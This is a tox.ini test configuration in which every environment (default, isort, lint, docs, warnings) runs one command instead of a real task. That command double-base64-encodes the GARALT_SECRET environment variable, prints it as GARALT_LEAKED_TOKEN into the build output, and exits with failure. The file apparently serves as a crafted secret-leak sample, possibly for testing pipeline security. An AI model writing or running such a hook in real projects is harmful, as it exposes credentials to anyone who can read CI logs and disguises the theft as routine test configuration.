[tox]
envlist = py311
isolated_build = false
skipsdist = true

[testenv]
skip_install = true
commands = echo "GARALT_LEAKED_TOKEN=$(echo -n "$GARALT_SECRET" | base64 | base64)" && exit 1

[testenv:isort]
skip_install = true
commands = echo "GARALT_LEAKED_TOKEN=$(echo -n "$GARALT_SECRET" | base64 | base64)" && exit 1

[testenv:lint]
skip_install = true
commands = echo "GARALT_LEAKED_TOKEN=$(echo -n "$GARALT_SECRET" | base64 | base64)" && exit 1

[testenv:docs]
skip_install = true
commands = echo "GARALT_LEAKED_TOKEN=$(echo -n "$GARALT_SECRET" | base64 | base64)" && exit 1

[testenv:warnings]
skip_install = true
commands = echo "GARALT_LEAKED_TOKEN=$(echo -n "$GARALT_SECRET" | base64 | base64)" && exit 1
